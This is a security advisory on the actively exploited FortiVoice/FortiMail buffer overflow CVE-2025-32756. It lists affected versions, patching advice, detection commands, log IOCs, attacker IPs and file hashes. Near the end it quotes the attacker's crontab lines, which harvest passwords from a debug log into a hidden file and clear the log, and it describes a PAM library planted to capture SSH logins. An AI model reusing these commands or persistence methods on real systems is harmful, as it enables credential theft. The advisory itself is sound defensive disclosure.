Threat Insight
CVE-2025-32756: FortiVoice Zero-Day Buffer Overflow Exploited
Fortinet recently published an advisory[1] for a Zero-Day Remote Code Execution flaw, which was found to have been exploited in the wild by an undisclosed threat actor.
This vulnerability is a stack-based buffer overflow vulnerability, affecting multiple Fortinet products, including FortiVoice, FortiRecorder, FortiMail, FortiNDR, and FortiCamer.
The flaw allows a remote, unauthenticated attacker to execute arbitrary code or commands by sending specially crafted HTTP requests with a manipulated hash cookie.
Successful exploitation of this vulnerability could allow an attacker to:
– Execute arbitrary commands, potentially leading to attackers taking full control of affected systems,
– Data breaches, as attackers could access sensitive information.
– Attackers may pivot to other internal systems, escalate privileges, and compromise additional assets.
The attack can be performed remotely without needing valid credentials.
The attacker must be able to send HTTP requests to the vulnerable system.
Additionally, the flaw arises from the fcgi debugging option being enabled on the affected system.
This is not a default setting, so unless you have enabled it in the past, this is potentially an Indicator of Compromise.
CVE
CVE-2025-32756
Affected Products
FortiCamera 2.1 2.1.0 through 2.1.3
FortiCamera 2.0 2.0 all versions
FortiCamera 1.1 1.1 all versions
FortiMail 7.6 7.6.0 through 7.6.2
FortiMail 7.4 7.4.0 through 7.4.4
FortiMail 7.2 7.2.0 through 7.2.7
FortiMail 7.0 7.0.0 through 7.0.8
FortiNDR 7.6 7.6.0
FortiNDR 7.4 7.4.0 through 7.4.7
FortiNDR 7.2 7.2.0 through 7.2.4
FortiNDR 7.1 7.1 all versions
FortiNDR 7.0 7.0.0 through 7.0.6
FortiNDR 1.5 1.5 all versions
FortiNDR 1.4 1.4 all versions
FortiNDR 1.3 1.3 all versions
FortiNDR 1.2 1.2 all versions
FortiNDR 1.1 1.1 all versions
FortiRecorder 7.2 7.2.0 through 7.2.3
FortiRecorder 7.0 7.0.0 through 7.0.5
FortiRecorder 6.4 6.4.0 through 6.4.5
FortiVoice 7.2 7.2.0
FortiVoice 7.0 7.0.0 through 7.0.6
FortiVoice 6.4 6.4.0 through 6.4.10
Exploitation
Fortinet reported that the vulnerability was actively exploited in the wild, specifically targeting FortiVoice systems. However, the company did not provide details on the extent of the attacks or identify the threat actors responsible.
Additionally, the threat actor was observed conducting network scans on affected devices, deleting system crash logs, and enabling FCGI debugging to capture credentials from the system or SSH login attempts.
Recommended Actions
Users of FortiVoice, FortiMail, FortiNDR, FortiRecorder, and FortiCamera are strongly encouraged to apply the required patches to protect their devices from ongoing exploitation attempts.
If immediate patching is not feasible, disabling the HTTP/HTTPS administrative interface is recommended as a temporary security measure.
Detection
To verify if fcgi debugging is enabled on your system, use the following CLI command:
diag debug application fcgi
If the output shows “general to-file ENABLED”, it means fcgi debugging is enabled on your system:
fcgi debug level is 0x80041
general to-file ENABLED
The following log entries are possible IOCs:
Output of CLI command ‘diagnose debug application httpd display trace-log’:
[x x x x:x:x.x 2025] [fcgid:warn] [pid 1829] [client x.x.x.x:x] mod_fcgid: error reading data, FastCGI server closed connection
[x x x x:x:x.x 2025] [fcgid:error] [pid 1503] mod_fcgid: process /migadmin/www/fcgi/admin.fe(1741) exit(communication error), get unexpected signal 11
The following log entries are possible IOCs:
Output of CLI command ‘diagnose debug application httpd display trace-log’:
[x x x x:x:x.x 2025] [fcgid:warn] [pid 1829] [client x.x.x.x:x] mod_fcgid: error reading data, FastCGI server closed connection
[x x x x:x:x.x 2025] [fcgid:error] [pid 1503] mod_fcgid: process /migadmin/www/fcgi/admin.fe(1741) exit(communication error), get unexpected signal 11
IP addresses observed being used by the threat actor:
198[.]105[.]127[.]124
43[.]228[.]217[.]173
43[.]228[.]217[.]82
156[.]236[.]76[.]90
218[.]187[.]69[.]244
218[.]187[.]69[.]59
The following system files may have been modified or added by the threat actor:
– [Added File] /bin/wpad_ac_helper – MD5:4410352e110f82eabc0bf160bec41d21 – main malware file
– [Added File] /bin/busybox – MD5:ebce43017d2cb316ea45e08374de7315 and 489821c38f429a21e1ea821f8460e590
– /data/etc/crontab – A line was added to grep sensitive data from fcgi.debug:
0 */12 * * * root busybox grep -rn passw /var/spool/crashlog/fcgi.debug > /var/spool/.sync; cat /dev/null >/var/spool/crashlog/fcgi.debug
– /var/spool/cron/crontabs/root – A line was added to backup fcgi.debug:
0 */12 * * * root cat /var/spool/crashlog/fcgi.debug > /var/spool/.sync; cat /dev/null >/var/spool/crashlog/fcgi.debug
– [Added File] /var/spool/.sync – Credentials are gathered into this file by the cron jobs above
– /etc/pam.d/sshd – Lines were added to it to include malicious libfmlogin.so below
– [Added File] /lib/libfmlogin.so – MD5:364929c45703a84347064e2d5de45bcd – malicious library that logs username and password using SSH login
– [Added File] /tmp/.sshdpm – contains credentials gathered by /lib/libfmlogin.so above
– [Added File] /bin/fmtest – MD5: 2c8834a52faee8d87cff7cd09c4fb946 – Script to scan the network
– /etc/httpd.conf – A line was added to include socks.so: LoadModule socks5_module modules/mod_socks5.so